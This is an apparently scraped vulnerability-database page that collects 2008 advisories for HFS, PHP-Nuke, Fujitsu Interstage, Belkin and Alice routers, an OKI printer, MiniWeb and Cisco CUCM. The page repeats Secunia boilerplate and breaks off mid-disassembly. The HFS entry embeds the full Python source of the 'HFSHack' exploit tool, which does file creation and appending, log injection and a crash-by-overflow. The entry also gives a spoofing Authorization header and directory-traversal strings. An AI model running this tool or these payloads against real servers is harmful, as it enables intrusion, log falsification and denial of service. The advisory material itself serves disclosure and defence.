VARIoT IoT vulnerabilities database

HTTP File Server (HFS) before 2.2c tags HTTP request log entries with the username sent during HTTP Basic Authentication, regardless of whether authentication succeeded, which might make it more difficult for an administrator to determine who made a remote request. HFS (HTTP File Server) is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a denial-of-service issue, a username-spoofing issue, and a logfile-forging issue. A successful exploit could allow an attacker to deny service to legitimate users, create and execute arbitrary files in the context of the webserver process, falsify log information, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: HTTP File Server Multiple Vulnerabilities SECUNIA ADVISORY ID: SA28631 VERIFY ADVISORY: http://secunia.com/advisories/28631/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Spoofing, Manipulation of data, Exposure of system information, DoS, System access WHERE: >From remote SOFTWARE: HTTP File Server 2.x http://secunia.com/product/16793/ DESCRIPTION: Felipe Aragon and Alec Storm have reported some vulnerabilities and security issues in HTTP File Server, which can be exploited by malicious people to disclose system information, conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, manipulate data, and potentially compromise a vulnerable system. 1) The application does not correctly log certain input. This can be exploited to e.g. spoof the username or inject arbitrary content into the logfile when logging in. 2) Certain input is not properly sanitised before being returned to a user. 3) It is possible to disclose certain information (e.g. number of connections, transfer speed, traffic statistics, or uptime) by sending specially crafted request containing template symbols. 4) The application does not correctly handle the username before using it to create the file name of the logfile. This can be exploited to create directories, append data to files, or to cause a buffer overflow by sending specially crafted requests to a vulnerable server. Successful exploitation allows the execution of arbitrary code, but requires that the "%user%" template symbol is used to define the name of the logfile. SOLUTION: Some of the vulnerabilities are fixed in version 2.2c. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . #!/usr/bin/python """ ---------------------------------------------------------------- HFSHack 1.0b (By Felipe M. Examples:\n' ' mkd Test or ..\\..\\Windows\\Test\n\n' 'symbols\n' ' Forces HFS to reveal details about the server\n\n' 'ver\n' ' Forces HFS to show its version and build, and displays which\n\n' ' HFSHack commands are available for it\n' 'quit\n' ' Exits this application' '\r\n') readme = ( '(c) 2008 Syhunt Security. All rights reserved.\n\n' 'This tool is provided ''as-is'', without any expressed or implied\n' 'warranty. In no event will the author be held liable for any\n' 'damages arising from the use of this tool.\n\n' 'Permission is granted to anyone to use this tool, and to alter\n' 'it and redistribute it freely, subject to the following\n' 'restrictions:\n\n' '1. The origin of this tool must not be misrepresented, you must\n' ' not claim that you wrote the original tool.\n\n' '2. Altered source versions must be plainly marked as such, and\n' ' must not be misrepresented as being the original plugin.\n\n' '3. This notice may not be removed or altered from any source\n' ' distribution.\n\n' 'If you have any questions concerning this license, please email\n' 'contact _at_ syhunt _dot_ com\n' ) about = ( '----------------------------------------------------------------\n' ' Syhunt HFSHack 1.0b\n' '----------------------------------------------------------------\n\n' 'This exploit tool should be used only by system administrators\n' '(or other people in charge).\n\n' 'Type "readme" and read the text before continuing\n\n' 'If you have already read it, type "help" to view a list of\n' 'commands.' ) # Extra Details to Obtain symbol_list = ( 'connections;Current number of connections to HFS', 'timestamp;Date and time of the server', 'uptime;Uptime', 'speed-out;Current outbound speed', 'speed-in;Current inbound speed', 'total-out;Total amount of bytes sent', 'total-downloads;Total amount of bytes sent', 'total-hits;Total Hits', 'total-uploads;Total Uploads', 'number-addresses;Current number of connected clients (IPs)', 'number-addresses-ever;Number of unique IPs ever connected', 'number-addresses-downloading;Current number of downloading clients (IPs)', ) # Affected Versions re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)' re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)' re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)' re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])' # Common Messages msg_par_mis = 'Parameter(s) missing.' msg_done = 'Done.\n' msg_acc_file = 'Error reading local file (file not found):' msg_help = 'Type "help" to view a list of commands.' msg_err_con = 'Error Connecting:' msg_fail = 'Failed.' msg_req_ok = 'Request accepted.' uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)'; path = '/' # Default Path def dorequest(hpath,auth_data,s_msg,f_msg): globals()["rcvd"] = '' globals()["banner"] = '' url = 'http://'+host+hpath try: opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', uagent)] if auth_data != '': opener.addheaders = [('Authorization', 'Basic '+auth_data)] globals()["rcvd"] = opener.open(url).readlines() if 'server' in opener.open(url).headers: globals()["banner"] = opener.open(url).headers['server'] except Exception, msg: if f_msg != '': print f_msg,msg return False else: if s_msg != '': print s_msg return True def genbase64str(string): base64str = base64.encodestring(string); base64str = base64str.replace("\n","") return base64str def readlocalfile(filename): file = open(filename, "r") text = file.readlines() file.close() print text filecontentstr = '' for l in text: filecontentstr = filecontentstr+l return filecontentstr def ishostavailable(): return dorequest(path,'','',msg_err_con) def getservinfo(symbol,desc): base64str = base64.encodestring('<id>%'+symbol+'%</id>'); if dorequest(path,base64str,'',msg_err_con): for l in rcvd: hfsver = re.findall('<id>(.*?)</id>', l) for r in hfsver: if r != []: hfsverdec = urllib2.unquote(hfsver[0]) if desc != '': print desc+': '+hfsverdec return hfsverdec else: return '' def getallservinf(): for l in symbol_list: curl = l.split(';') getservinfo(curl[0],curl[1]) def hfsmkdir(dirname): base64str = genbase64str('\\..\\'+dirname+'\\')+'AA'; dorequest(path,base64str,msg_req_ok,msg_fail) def shutdownhfs(): dosstr = genbase64str('a' * 270 + ':') if dorequest(path,dosstr,msg_fail,'DoS executed.'): dorequest(path,'','Host is still up.','Host is now down.') def hfsappendtofile(filename,string): base64str = genbase64str('\\..\\'+filename)+'AA'; dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail) def hfsinjecttolog(string): base64str = genbase64str(string); dorequest('/',base64str,msg_req_ok,msg_fail) def procparams(cmd): try: if len(cmd) > 0: if cmd[1] != []: globals()["host"] = cmd[1] except: print "No target info provided. Using localhost" def checkxss(): if ishostavailable(): curver = getservinfo('version','') if curver != '': return 'XSS Found' else: return 'Not Vulnerable' else: return msg_fail def isbanner(regex): p = re.compile(regex) m = p.match(banner) return m def showacceptedcmds(): cmds = 'None (This server is not vulnerable)'; if isbanner(re_200801161): cmds = 'checkxss symbols ver' if isbanner(re_200801162): cmds = cmds+' manipf mkd checkdos' if isbanner(re_200801163): cmds = cmds+' maniplog' print '\nAvailable commands for this server:' print ' '+cmds+'\n' def showver(): cangetver = True if banner != '': server_name = banner.split() print banner if server_name[0] != 'HFS': print 'Not running HFS!' cangetver = False else: if isbanner(re_cangetver): print 'Confirming version...' else: cangetver = False else: print 'No version information found.' print 'The "Send HFS identifier" option is probably disabled.' print 'Trying to force HFS to display its version...' if cangetver == True: idver = getservinfo('version','HFS version number') idbuild = getservinfo('build','HFS build number') globals()["banner"] = 'HFS '+idver+' '+idbuild showacceptedcmds() def result(s): cmd = s.split() if len(cmd) > 0: curcmd = cmd[0] result = 'Invalid command. Type "help" for list of commands.' if curcmd == 'open': procparams(cmd) if ishostavailable(): showver() result = 'Connected.\n' else: result = msg_fail elif curcmd == 'symbols': if ishostavailable(): showver() print 'Forcing HFS to reveal more details...' getallservinf() result = msg_done elif curcmd == 'ver': if ishostavailable(): showver() result = msg_done elif curcmd == 'mkd': if len(cmd) > 1: if cmd[1] != []: hfsmkdir(cmd[1]) result = msg_done else: result = msg_par_mis elif curcmd == 'manipf': if len(cmd) > 2: try: localfilecontent = readlocalfile(cmd[1]) except Exception, msg: result = msg_acc_file,msg else: localfilecontent = localfilecontent.replace("\n","%0a") hfsappendtofile(cmd[2],localfilecontent) result = msg_done else: result = msg_par_mis elif curcmd == 'maniplog': if len(cmd) > 1: try: localfilecontent = readlocalfile(cmd[1]) except Exception, msg: result = msg_acc_file,msg else: hfsinjecttolog(localfilecontent) result = msg_done else: result = msg_par_mis elif curcmd == 'checkdos': shutdownhfs() result = msg_done elif curcmd == 'checkxss': result = checkxss() elif curcmd == 'help': result = help elif curcmd == 'readme': result = readme elif curcmd == 'quit': result = 'Bye!' return result else: return msg_help print about s = "" while s != "quit": try: s = raw_input(">") except EOFError: s = "quit" print s print result(s). Syhunt: HFS (HTTP File Server) Username Spoofing and Log Forging/Injection Vulnerability Advisory-ID: 200801163 Discovery Date: 1.16.2008 Release Date: 1.23.2008 Affected Applications: HFS 1.5g to and including 2.3(Beta Build #174); and possibly HFS version 1.5f Non-Affected Applications: HFS 1.5e and earlier versions Class: Log Forging/Injection, Username Spoofing Status: Patch available/Vendor informed Vendor: Massimo Melina Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVEs to these vulnerabilities: * CVE-2008-0407 - Username Spoofing Vulnerability * CVE-2008-0408 - Log Forging / Injection Vulnerability ---------------------------------------------------------------- Overview: HFS is a very popular open source HTTP server designed for easily sharing files. According to information on the official website, the HTTP File Server software has been downloaded about 2 million times. Description: HFS versions 1.5g to 2.3 Beta (and possibly version 1.5f) are vulnerable to log forging and username spoofing vulnerabilities. Remote attackers can appear to be logged in with any desired username or perform log injection in the log file and GUI panel. Technical details are included below. ---------------------------------------------------------------- Details (Replicating the issues): 1) Log Forging / Injection Vulnerability http://www.syhunt.com/advisories/hfshack.txt See the "maniplog" command maniplog [localfilename] This will inject the content of [localfilename] to the HFS log panel and file. 2) Username Spoofing Vulnerability a. Login at http://[host]/~login as [user_x]. Then request (using a web browser): http://[user_y]:[anywrongpwd]@[host]/ --or-- b. send a direct request in the following format (does not require previous login): GET / HTTP/1.1 (...) Authorization: Basic dXNlcl95 Both alternatives could make an admin to believe that user Y has made the HTTP request when reviewing logs. Additional Considerations: * Vulnerabilities described here will not allow browsing protected files and folders. ---------------------------------------------------------------- Vulnerability Status: The author was contacted and HFS version 2.2c was released. The new version can be downloaded at www.rejetto.com/hfs/download or via the "Check for news/updates" option in the HFS menu. Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta build. HFS 2.3 Beta is only affected if the option "Accept any login for unprotected resources" is enabled. This option, introduced in this version, is disabled by default. ---------------------------------------------------------------- Credit: Felipe Aragon and Alec Storm Syhunt Security Research Team, www.syhunt.com --- Copyright \xa9 2008 Syhunt Security Disclaimer: The information in this advisory is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes. Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this advisory

SQL injection vulnerability in index.php in the Search module in PHP-Nuke 8.0 FINAL and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the sid parameter in a comments action to modules.php. NOTE: some of these details are obtained from third party information. PHP-Nuke is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: PHP-Nuke "modules/Search/index.php" SQL Injection SECUNIA ADVISORY ID: SA28624 VERIFY ADVISORY: http://secunia.com/advisories/28624/ CRITICAL: Moderately critical IMPACT: Manipulation of data, Exposure of sensitive information WHERE: >From remote SOFTWARE: PHP-Nuke 8.x http://secunia.com/product/13524/ DESCRIPTION: Foster & 1dt.w0lf have discovered a vulnerability in PHP-Nuke, which can be exploited by malicious people to conduct SQL injection attacks. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows e.g. retrieving the administrator password hash, but requires that "magic_quotes_gpc" is disabled - not the value recommended by the installer - and having knowledge of the database table prefix. The vulnerability is confirmed in version 8.0. Other versions may also be affected. SOLUTION: Edit the source code to ensure that input is properly sanitised. Set "magic_quotes_gpc" in php.ini to On. Use another product. PROVIDED AND/OR DISCOVERED BY: Foster & 1dt.w0lf ORIGINAL ADVISORY: http://milw0rm.com/exploits/4965 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Fujitsu Interstage HTTP Server, as used in Interstage Application Server 5.0, 7.0, 7.0.1, and 8.0.0 for Windows, allows attackers to cause a denial of service via a crafted request. Remote attackers can exploit these issues to deny service to legitimate users. Currently, very little is known about these issues. We will update this BID as more information emerges. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) Some errors within the HTTP Server can be exploited to cause a DoS or to conduct cross-site scripting attacks. For more information: SA26273 SA26636 2) An unspecified error when receiving certain requests can be exploited to cause a DoS. This affects Windows systems with the following urgent corrections applied. * TP08940 * TP38940 3) An unspecified error when using SSL can be exploited to cause a DoS. This affects Solaris systems with the following urgent corrections applied. * T023AS-03 Please see the vendor advisory for a list of affected products. SOLUTION: The vendor has released patches for certain versions. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: 2, 3) Reported by the vendor. ORIGINAL ADVISORY: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200802e.html OTHER REFERENCES: SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Fujitsu Interstage HTTP Server, as used in Interstage Application Server Enterprise Edition 7.0.1 for Solaris, allows attackers to cause a denial of service via unknown vectors related to SSL. Remote attackers can exploit these issues to deny service to legitimate users. Currently, very little is known about these issues. We will update this BID as more information emerges. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) Some errors within the HTTP Server can be exploited to cause a DoS or to conduct cross-site scripting attacks. For more information: SA26273 SA26636 2) An unspecified error when receiving certain requests can be exploited to cause a DoS. This affects Windows systems with the following urgent corrections applied. * TP08940 * TP38940 3) An unspecified error when using SSL can be exploited to cause a DoS. This affects Solaris systems with the following urgent corrections applied. * T023AS-03 Please see the vendor advisory for a list of affected products. SOLUTION: The vendor has released patches for certain versions. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: 2, 3) Reported by the vendor. ORIGINAL ADVISORY: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200802e.html OTHER REFERENCES: SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The web server in Belkin Wireless G Plus MIMO Router F5D9230-4 does not require authentication for SaveCfgFile.cgi, which allows remote attackers to read and modify configuration via a direct request to SaveCfgFile.cgi. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issue affects firmware version 3.01.53; other versions may also be vulnerable. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. The vulnerability is caused due to missing authentication checks when accessing the SaveCfgFile.cgi script, which can be exploited to disclose sensitive information like the router's password. Note: If remote management is enabled, this can also be exploited from people outside the local network. SOLUTION: Restrict access to the device or use it in trusted network environments only. Reportedly, the vendor is working on a fix. A fixed beta version should be available soon, a final version is planned to be released before end of February. PROVIDED AND/OR DISCOVERED BY: DarkFig ORIGINAL ADVISORY: http://milw0rm.com/exploits/4941 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site request forgery in cp06_wifi_m_nocifr.cgi in the administrator panel in TELECOM ITALIA Alice Gate2 Plus Wi-Fi allows remote attackers to hijack the authentication of administrators for requests that disable Wi-Fi encryption via certain values for the wlChannel and wlRadioEnable parameters. Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability. An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. The vulnerability is caused due to the device allowing users to perform certain actions via HTTP requests, without checking the validity of the request or proper authentication of the user sending the request. This can be exploited by malicious people to e.g. disable the encryption of the wireless network by tricking a user into visiting a malicious site. SOLUTION: Visit trusted sites only. Use a firewall to restrict access to the affected device. PROVIDED AND/OR DISCOVERED BY: WarGame/DoomRiderz ORIGINAL ADVISORY: http://vx.netlux.org/wargamevx/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

OKI C5510MFP Printer CU H2.15, PU 01.03.01, System F/W 1.01, and Web Page 1.00 sends the configuration of the printer in cleartext, which allows remote attackers to obtain the administrative password by connecting to TCP port 5548 or 7777. The OKI C5510MFP Printer is prone to an unauthorized-access vulnerability because it obtains configuration details and administrator passwords in an insecure manner. An attacker can exploit this issue to set arbitrary printer configuration settings and administrative passwords. The impact of a successful exploit will vary depending on the settings reconfigured. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: OKI C5510MFP Configuration Interface Security Issues SECUNIA ADVISORY ID: SA28553 VERIFY ADVISORY: http://secunia.com/advisories/28553/ CRITICAL: Less critical IMPACT: Security Bypass, Exposure of sensitive information WHERE: >From local network OPERATING SYSTEM: OKI C5550MFP http://secunia.com/product/17253/ DESCRIPTION: Compass Security AG has reported two security issues in OKI C5510MFP, which can be exploited by malicious people to disclose sensitive information and to bypass certain security restrictions. 1) A security issue is caused due to the configuration of the printer being sent in clear text when connecting to TCP ports 5548 or 7777. This can be exploited to obtain the administration password by connecting to the affected ports. 2) The problem is that the password can be reset without authentication. This can be exploited to gain access to the configuration interface. Other versions may also be affected. SOLUTION: Restrict network access to trusted users only. PROVIDED AND/OR DISCOVERED BY: Compass Security AG ORIGINAL ADVISORY: http://www.csnc.ch/en/modules/news/news_0004.html_1394092626.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in OKI C5510MFP Printer CU H2.15, PU 01.03.01, System F/W 1.01, and Web Page 1.00 allows remote attackers to set the password and obtain administrative access via unspecified vectors. An attacker can exploit this issue to set arbitrary printer configuration settings and administrative passwords. The impact of a successful exploit will vary depending on the settings reconfigured. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: OKI C5510MFP Configuration Interface Security Issues SECUNIA ADVISORY ID: SA28553 VERIFY ADVISORY: http://secunia.com/advisories/28553/ CRITICAL: Less critical IMPACT: Security Bypass, Exposure of sensitive information WHERE: >From local network OPERATING SYSTEM: OKI C5550MFP http://secunia.com/product/17253/ DESCRIPTION: Compass Security AG has reported two security issues in OKI C5510MFP, which can be exploited by malicious people to disclose sensitive information and to bypass certain security restrictions. 1) A security issue is caused due to the configuration of the printer being sent in clear text when connecting to TCP ports 5548 or 7777. This can be exploited to obtain the administration password by connecting to the affected ports. 2) The problem is that the password can be reset without authentication. This can be exploited to gain access to the configuration interface. Other versions may also be affected. SOLUTION: Restrict network access to trusted users only. PROVIDED AND/OR DISCOVERED BY: Compass Security AG ORIGINAL ADVISORY: http://www.csnc.ch/en/modules/news/news_0004.html_1394092626.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Directory traversal vulnerability in the mwGetLocalFileName function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to read arbitrary files and list arbitrary directories via a (1) .%2e (partially encoded dot dot) or (2) %2e%2e (encoded dot dot) in the URI. MiniWeb is prone to a directory-traversal vulnerability and a heap-based buffer-overflow vulnerability. An attacker can exploit this issue to gain access to files outside the webroot, execute arbitrary code within the context of the affected application, or crash the application. This issue affects MiniWeb 0.8.19; other versions may also be affected. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: MiniWeb HTTP Server Buffer Overflow and Directory Traversal SECUNIA ADVISORY ID: SA28512 VERIFY ADVISORY: http://secunia.com/advisories/28512/ CRITICAL: Highly critical IMPACT: Exposure of system information, Exposure of sensitive information, DoS, System access WHERE: >From remote SOFTWARE: MiniWeb HTTP Server 0.x http://secunia.com/product/14459/ DESCRIPTION: Hamid Ebadi has discovered two vulnerabilities in MiniWeb HTTP Server, which can be exploited by malicious people to disclose sensitive information, to cause a DoS (Denial of Service), or to potentially compromise a vulnerable system. 1) A boundary error exists within the "_mwProcessReadSocket()" function in http.c. This can be exploited to cause a heap-based buffer overflow via a URL that is 3600-4000 characters long. Successful exploitation of this vulnerability allows performing a DoS (Denial of Service) or the potential execution of arbitrary code. 2) Input passed in the URL to the "mwGetLocalFileName()" function in http.c is not properly sanitised before being used. This can be exploited to display arbitrary files with directory traversal attacks of the form ".%2e/.%2e/" or "%2e%2e/%2e%2e/". The vulnerabilities are confirmed in version 0.8.19. SOLUTION: Restrict access to the web service. Use another product. PROVIDED AND/OR DISCOVERED BY: Hamid Ebadi ORIGINAL ADVISORY: http://www.bugtraq.ir/adv/miniweb_english.pdf ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in the _mwProcessReadSocket function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to execute arbitrary code via a long URI. MiniWeb is prone to a directory-traversal vulnerability and a heap-based buffer-overflow vulnerability. An attacker can exploit this issue to gain access to files outside the webroot, execute arbitrary code within the context of the affected application, or crash the application. This issue affects MiniWeb 0.8.19; other versions may also be affected. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: MiniWeb HTTP Server Buffer Overflow and Directory Traversal SECUNIA ADVISORY ID: SA28512 VERIFY ADVISORY: http://secunia.com/advisories/28512/ CRITICAL: Highly critical IMPACT: Exposure of system information, Exposure of sensitive information, DoS, System access WHERE: >From remote SOFTWARE: MiniWeb HTTP Server 0.x http://secunia.com/product/14459/ DESCRIPTION: Hamid Ebadi has discovered two vulnerabilities in MiniWeb HTTP Server, which can be exploited by malicious people to disclose sensitive information, to cause a DoS (Denial of Service), or to potentially compromise a vulnerable system. 1) A boundary error exists within the "_mwProcessReadSocket()" function in http.c. Successful exploitation of this vulnerability allows performing a DoS (Denial of Service) or the potential execution of arbitrary code. 2) Input passed in the URL to the "mwGetLocalFileName()" function in http.c is not properly sanitised before being used. This can be exploited to display arbitrary files with directory traversal attacks of the form ".%2e/.%2e/" or "%2e%2e/%2e%2e/". The vulnerabilities are confirmed in version 0.8.19. SOLUTION: Restrict access to the web service. Use another product. PROVIDED AND/OR DISCOVERED BY: Hamid Ebadi ORIGINAL ADVISORY: http://www.bugtraq.ir/adv/miniweb_english.pdf ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in the Certificate Trust List (CTL) Provider service (CTLProvider.exe) in Cisco Unified Communications Manager (CUCM) 4.2 before 4.2(3)SR3 and 4.3 before 4.3(1)SR1, and CallManager 4.0 and 4.1 before 4.1(3)SR5c, allows remote attackers to cause a denial of service or execute arbitrary code via a long request. Cisco Unified Communications Manager (CUCM) and CallManager Contains a heap overflow vulnerability. Attackers can exploit this issue to execute arbitrary code or to cause denial-of-service conditions. Authentication is not required to exploit this vulnerability. The service operates over a SSL encrypted transport. Due to a logic flaw in the way data is received in a loop a heap allocation can be arbitrarily overflown resulting in the control of subsequent heap chunks. The vulnerability is due to a loop that occurs during receive of socket data. An initial buffer is allocated at 0x19000 bytes, as can bee seen here. .text:00406077 191A8 68+ push 19000h ; size_t .text:0040607C 191AC FF+ call ds:__imp_malloc .text:00406082 191AC 83+ add esp, 10h .text:00406085 1919C 89+ mov [edi+14h], eax .text:00406088 1919C 85+ test eax, eax .text:0040608A 1919C 0F+ jz loc_406238 Once allocated data is read in 0x19000 chunks. If more than 0x4000 bytes of data are left on the socket we loop again as can be seen here. .text:004060A5 191AC FF+ push dword ptr [ebp-14h] ; size_t .text:004060A8 191B0 8D+ lea eax, 